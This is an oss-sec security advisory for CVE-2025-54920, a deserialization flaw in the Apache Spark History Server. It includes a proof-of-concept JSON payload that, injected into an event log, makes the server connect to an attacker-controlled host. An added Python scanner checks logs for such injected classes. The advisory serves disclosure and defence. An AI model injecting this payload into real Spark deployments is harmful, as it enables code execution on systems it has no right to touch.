CVE-2025-54920: Apache Spark Spark History Server Code Execution Vulnerability Analysis

oss-sec mailing list archives

From: Holden Karau <holden () apache org>
Date: Fri, 13 Mar 2026 21:14:32 +0000

Severity: low 

Affected versions:

- Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) before 3.5.7
- Apache Spark (org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1

Description:

This issue affects Apache Spark versions before 3.5.7 and 4.0.0 before 4.0.1. Users are recommended to upgrade to
version 3.5.7 or 4.0.1 or later, which fix the issue.

Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to 
overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event 
logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command 
execution on the host running the Spark History Server.
Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with 
@JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the 
event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which 
can perform network calls or other malicious actions during deserialization.


The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History 
Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server 
to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

{
  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}

3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.
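A defender-side check for the condition described in Details and exercised by the PoC, added here as an example and not part of the advisory: it scans an event log for "Event" values naming classes outside Spark's own packages, and consumes JSON values with raw_decode so that a pretty-printed injected object spanning several lines is not missed by a line-by-line reader. The allowlist rule (simple SparkListener* names plus the org.apache.spark. prefix) is an assumption about what Spark's JsonProtocol writes; the sample log is constructed.

```python
import json
import re
from typing import Iterator

# Assumption about Spark's JsonProtocol output: built-in events are logged under
# their simple class name, SQL/streaming events under fully qualified names in
# org.apache.spark. Any other name is a class handed to Jackson via Id.CLASS.
TRUSTED_PREFIXES = ("org.apache.spark.",)
SIMPLE_EVENT = re.compile(r"^SparkListener[A-Za-z0-9]+$")


def iter_events(text: str) -> Iterator[dict]:
    """Yield every top-level JSON value in the log, regardless of line breaks.
    Spark writes one object per line, but an injected payload may be
    pretty-printed across lines, so raw_decode is used instead of splitlines."""
    decoder = json.JSONDecoder()
    pos, end = 0, len(text)
    while True:
        while pos < end and text[pos].isspace():
            pos += 1
        if pos >= end:
            return
        obj, pos = decoder.raw_decode(text, pos)
        yield obj


def suspicious_events(text: str) -> list[str]:
    """Return Event names that are neither built-in nor under a trusted package."""
    findings = []
    try:
        for obj in iter_events(text):
            event = obj.get("Event") if isinstance(obj, dict) else None
            if not isinstance(event, str):
                findings.append(f"<missing Event: {json.dumps(obj)[:60]}>")
            elif not (SIMPLE_EVENT.match(event) or event.startswith(TRUSTED_PREFIXES)):
                findings.append(event)
    except json.JSONDecodeError as e:  # garbage or a truncated object: report and stop
        findings.append(f"<unparseable: {e.msg} at offset {e.pos}>")
    return findings


# Constructed sample: the advisory's payload prepended to three ordinary events.
SAMPLE_LOG = """\
{
  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {"hive.metastore.uris": "thrift://<IP>:<PORT>"}
}
{"Event":"SparkListenerLogStart","Spark Version":"3.5.4"}
{"Event":"org.apache.spark.sql.execution.ui.SparkListenerSQLExecutionStart","executionId":0}
{"Event":"SparkListenerApplicationEnd","Timestamp":1}
"""
```

Running suspicious_events(SAMPLE_LOG) returns only the injected class name; run it over the event log directory the History Server reads before pointing the server at it.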

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, 
potentially compromising the entire system.

This issue is being tracked as SPARK-52381.

Credit:

Alexandre Pujol (Linagora) (finder)

References:

https://github.com/apache/spark/pull/51312
https://github.com/apache/spark/pull/51323
https://issues.apache.org/jira/browse/SPARK-52381
https://spark.apache.org/
https://www.cve.org/CVERecord?id=CVE-2025-54920


Source: https://seclists.org/oss-sec/2026/q1/310